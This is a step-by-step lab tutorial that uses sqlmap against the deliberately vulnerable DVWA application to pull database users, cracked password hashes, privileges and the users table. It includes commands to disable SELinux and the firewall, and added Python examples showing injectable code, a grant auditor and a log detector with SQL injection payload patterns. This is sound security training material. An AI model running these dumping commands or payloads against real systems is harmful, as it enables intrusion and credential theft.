Monday, 18 November 2013

Hands-On Guide - Automate SQL Injection with SqlMap (DVWA): Lesson 7



Section 0. Background Information
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
        This material is intended for educational purposes.
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit Fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR Current mode: is set to permissive, skip the next steps and continue to the next section.
      3. If SELinux status: is set to enabled AND Current mode: is set to enforcing, continue with the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Placing a "0" in the enforce file puts selinux in permissive mode.
      2. sestatus
        • Notice that "Current mode:" changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
      2. service iptables stop
        • This command disables the firewall.
Section 5. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 6. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 8. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 9. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit
Section 10. Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select "SQL Injection" from the left navigation menu.
  2. Select Tamper Data
    • Instructions:
      1. Tools --> Tamper Data
  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper
  4. Basic Injection
    • Instructions:
      1. Input "1" into the text box.
      2. Click Submit.
    • Note:
      • The goal here is to see the GET request being made to the CGI program behind the scenes.
      • Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.
  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? textbox is unchecked.
      2. Then Click Submit
  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy
  7. Open Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad
  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit --> Paste
  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy
  10. Pasting the Cookie Information
    • Instructions:
      1. Edit --> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py
  2. Obtain Database User For DVWA
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • --current-db, Retrieve DBMS current database
        • --current-user, Retrieve DBMS current user
  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y
  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the current database is "dvwa" and the DBMS account the application connects with is "root@localhost".

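Section 11 shows sqlmap confirming that the id parameter is injectable and that the application talks to MySQL as root@localhost. The following is an added example, not DVWA's own PHP, that models the underlying defect in Python with SQLite so it can be run offline: SAMPLE_USERS, the hash placeholders and the three lookup functions are constructed for illustration. The first function builds the query by string concatenation, the pattern DVWA's "low" level uses; the second binds the value as a parameter; the third additionally validates that id is an integer before any query is built.

```python
import sqlite3

# Constructed stand-in for the dvwa.users table; the hashes are placeholders,
# not real DVWA data.
SAMPLE_USERS = [
    (1, "admin", "hash-placeholder-1"),
    (2, "gordonb", "hash-placeholder-2"),
    (3, "1337", "hash-placeholder-3"),
]


def make_db():
    """Build an in-memory SQLite database shaped like dvwa.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, id_param):
    """String concatenation, the pattern DVWA's 'low' level uses: the request
    parameter is spliced into the SQL text, so a quote in the value closes the
    literal and whatever follows is parsed as SQL."""
    query = f"SELECT user FROM users WHERE user_id = '{id_param}' ORDER BY user_id"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, id_param):
    """Placeholder binding: the driver sends the value as data and compares it
    as a whole, so input containing SQL syntax matches nothing instead of
    everything."""
    rows = conn.execute(
        "SELECT user FROM users WHERE user_id = ? ORDER BY user_id", (id_param,))
    return [row[0] for row in rows]


def lookup_validated(conn, id_param):
    """Defence in depth: reject anything that is not an integer id before a
    query is built; returns None for rejected input."""
    if not id_param.isdigit():
        return None
    return lookup_parameterized(conn, int(id_param))


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1' OR '1'='1"):
        print(repr(value), "concatenated:", lookup_vulnerable(db, value),
              "parameterized:", lookup_parameterized(db, value))
```

With the textbook tautology input the concatenated query returns every row of the table, which is exactly the condition sqlmap detects and then exploits in the later sections; the parameterized query returns no rows and the validated version never reaches the database. In DVWA's real stack the same fix is a prepared statement in PHP (mysqli or PDO) plus an integer check on id, and the application should connect as a dedicated low-privilege MySQL account rather than root.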

Section 12. Using SqlMap to Obtain Database Management Username and Password
  • NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
  1. Obtain Database Management Username and Password
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --string, Provide a string that is always present in the response to a valid (true) query.
        • --users, list database management system users
        • --password, list database management password for system users.
  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes:
      1. Notice the password for username db_hacker was cracked.
  3. Obtain db_hacker Database Privileges
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, Specify database management user
        • --privileges, list database management system user's privileges
  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user "db_hacker" has administrative privileges
      2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.

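Section 12 ends with two findings a defender should act on: a DBMS account with administrative privileges, and a host of "%" that lets it log in from anywhere. The following is an added example, not part of the original lab, that audits GRANT statements of the kind MySQL's SHOW GRANTS prints and flags those conditions, plus the case from Section 11 where the web application itself connects as root. The SAMPLE_GRANTS lines, the DANGEROUS set and the app_users parameter are constructed for illustration; they are not output from the lab database.

```python
import re

# Constructed SHOW GRANTS-style lines (not real output from the lab database).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `dvwa`.* TO 'dvwa_app'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO '(?P<user>[^']+)'@'(?P<host>[^']+)'"
    r"(?P<grant_opt> WITH GRANT OPTION)?$"
)

# Privileges no web application account should hold (illustrative set).
DANGEROUS = {"ALL PRIVILEGES", "SUPER", "FILE", "PROCESS", "SHUTDOWN", "CREATE USER"}


def audit_grant(line, app_users=()):
    """Return a list of findings for one GRANT statement; empty means nothing to flag.
    app_users: accounts ('user@host') that the web application connects with."""
    m = GRANT_RE.match(line)
    if not m:
        return ["unparseable grant: " + line]
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    account = f"{m.group('user')}@{m.group('host')}"
    findings = []
    if m.group("host") == "%":
        findings.append(f"{account}: may log in from any host ('%' wildcard)")
    risky = privs & DANGEROUS
    if risky:
        findings.append(f"{account}: holds {', '.join(sorted(risky))}")
    if m.group("grant_opt"):
        findings.append(f"{account}: can grant privileges to others (WITH GRANT OPTION)")
    if account in app_users and (risky or m.group("scope") == "*.*"):
        findings.append(f"{account}: web application account should be limited to its own schema")
    return findings


def audit(lines, app_users=()):
    """Audit every GRANT line and return all findings in order."""
    return [f for line in lines for f in audit_grant(line, app_users)]


if __name__ == "__main__":
    # Section 11 showed DVWA connecting as root@localhost.
    for finding in audit(SAMPLE_GRANTS, app_users={"root@localhost"}):
        print(finding)
```

Run against real output, the input would be the lines from SHOW GRANTS FOR each account in mysql.user; the dvwa_app example line is the shape a least-privilege application account should have, and on the lab box both root@localhost (because the application uses it) and db_hacker@% would be reported.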

Section 13. Obtain a list of all Databases
  1. Obtain a list of all databases
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, List database management system's databases.
  2. Review Results: Obtain a list of all databases
    • Note:
      1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain "dvwa" tables and contents
  1. Obtain "dvwa" tables and contents
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • --tables, List Database Tables
  2. Viewing "dvwa" tables and content results
    • Note:
      1. Notice sqlmap listed two tables: guestbook and users.
  3. Obtain columns for table dvwa.users
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • --columns, List the Columns of the Database Table.
  4. Viewing Results: columns for table dvwa.users
    • Note:
      1. Notice that the dvwa.users table has both a user column and a password column.
  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • --dump, Dump table contents
  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What's the dictionary location? <Press Enter>
      4. Use common password suffixes? y
  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes:
      1. Notice how sqlmap nicely displays passwords for each user.

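Everything sqlmap did in Sections 11 to 14 arrived at the Fedora box as ordinary HTTP requests, so the web server's access log is where a defender would see it. The following is an added example, not part of the original lab, that scans Apache combined-format log lines for the two most visible traits of such a run: the default sqlmap User-Agent and SQL syntax inside the id query parameter, and reports clients that trip the checks repeatedly. SAMPLE_LOG is a constructed log, not a capture from the lab; the patterns, function names and threshold are illustrative choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not a real capture): one normal DVWA
# request, then several that look like an automated injection run.
SAMPLE_LOG = """\
192.168.1.50 - - [18/Nov/2013:10:00:01 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4311 "http://192.168.1.106/dvwa/vulnerabilities/sqli/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"
192.168.1.105 - - [18/Nov/2013:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4311 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.105 - - [18/Nov/2013:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4311 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.105 - - [18/Nov/2013:10:01:03 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL&Submit=Submit HTTP/1.1" 200 4390 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.105 - - [18/Nov/2013:10:01:03 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 4311 "-" "Mozilla/5.0 (compatible)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query-string shapes a normal DVWA user never sends (illustrative, not exhaustive).
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean-tautology": re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I),
}


def classify(line):
    """Return (client ip, reasons) for one log line; reasons is empty for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparseable"]
    reasons = []
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    # Decode the query string so encoded quotes and spaces are visible to the patterns.
    query = unquote_plus(m.group("path").partition("?")[2])
    for name, pattern in SQLI_PATTERNS.items():
        if pattern.search(query):
            reasons.append(name)
    return m.group("ip"), reasons


def suspicious_clients(log_text, threshold=2):
    """Map client ip -> sorted list of distinct reasons, for clients with at
    least `threshold` flagged lines (a single odd request is usually noise)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        ip, reasons = classify(line)
        if ip and reasons:
            hits[ip].append(reasons)
    return {ip: sorted({r for rs in flagged for r in rs})
            for ip, flagged in hits.items() if len(flagged) >= threshold}


if __name__ == "__main__":
    for ip, reasons in suspicious_clients(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(reasons))
```

The User-Agent check is the cheapest signal and the easiest for a tester to change (sqlmap can send a custom one), which is why the query-string patterns and the per-client count matter more; in the lab, the BackTrack address from Section 7 is the client that would be reported.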
Section 15. Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Email to CSIRT247@Gmail.Com
